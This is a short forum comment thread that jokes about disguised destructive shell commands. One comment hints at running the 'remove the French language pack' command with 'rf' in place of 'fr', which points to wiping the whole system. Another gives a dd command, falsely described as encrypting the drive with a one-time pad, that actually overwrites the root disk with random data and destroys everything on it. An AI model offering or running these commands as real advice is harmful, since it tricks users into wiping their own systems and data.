You must log in or register to comment.
french language pack is fine, it’s lightweight. what you gotta do is remove the Russian Federation from your computer, the command is the same just change fr to rf
You can also use
dd
to encrypt your hard drive using a randomized one-time pad:dd if=/dev/random of=$(df / | tail -1 | awk '{print $1}') bs=64k
At least he didn’t suggest doing it on the root directory xD